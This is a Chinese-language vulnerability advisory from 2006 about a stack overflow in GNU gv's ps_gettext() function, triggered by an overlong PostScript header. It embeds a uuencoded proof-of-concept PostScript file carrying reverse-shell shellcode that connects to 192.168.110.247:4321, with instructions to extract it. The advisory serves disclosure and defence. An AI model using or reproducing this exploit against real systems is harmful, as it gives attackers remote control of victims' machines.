GNU GV浏览器ps_gettext()函数栈溢出漏洞
发布日期:2006-11-09
更新日期:2006-11-10
受影响系统:GNU gv 3.6.2
GNU gv 3.6.1
GNU gv 3.6
GNU gv 3.5.8
描述:
BUGTRAQ ID:
20978
gv是X窗口系统下的PostScript和PDF文件浏览器。
gv在处理PS文件中畸形的头时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。
gv浏览器的ps.c文件中的ps_gettext()函数存在栈溢出漏洞,问题在于将PS文件的一些特定头(如%%DocumentMedia:)中的超长标注无条件的拷贝到了text(栈上257字节长的缓冲区),导致远程攻击者可以通过诱骗用户打开恶意的文件导致执行任意代码。
<*来源:Renaud Lifchitz (
r.lifchitz@sysdream.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=116310920011969&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* Linux IA32 Reverse TCP Shell on 192.168.110.247:4321 (uuencoded
exploit) :
begin 644 hello-reverseshell.ps
M)2%04RU!9&]B92TS+C`*)254:71L93H@:&5L;&\N<',*)25&;W(Z(%)E;F%U
M9"!,:69C:&ET>B`M(%-Y<V1R96%M("T@:'1T<#HO+W=W=RYS>7-D<F5A;2YC
M;VTO"B4E0F]U;F1I;F=";W@Z(#(T(#(T(#4X."`W-C@*)25$;V-U;65N=$UE
M9&EA.B"0D)"0D)"0D#')@^GNV>[9="3T6X%S$](GKN*#Z_SB]./\_:&!3:R(
MM'\G`Q^G/;MB&&-BFUY7N8A/;DJ\T,B*PL;MA(&N3U*T=_^Q6\;M+U)UQLW]
M5,:*_47'C%O$_+%;QA[I'Z>NXD%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04'OO`0(04%!(#8Q,B`W.3(@,"`H*2`H*0HE)41O8W5M96YT1&%T
M83H@0VQE86XW0FET"B4E3W)I96YT871I;VXZ($QA;F1S8V%P90HE)5!A9V5S
M.B`Q"B4E4&%G94]R9&5R.B!!<V-E;F0*)24K(&5N8V]D:6YG($E33RTX.#4Y
9+3%%;F-O9&EN9PHE)45N9$-O;6UE;G1S"@``
`
end
Use:
$ uudecode < this-advisory.txt
to extract the exploit.
建议:
厂商补丁:
GNU
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.gnu.org浏览次数:4749
严重程度:0(网友投票)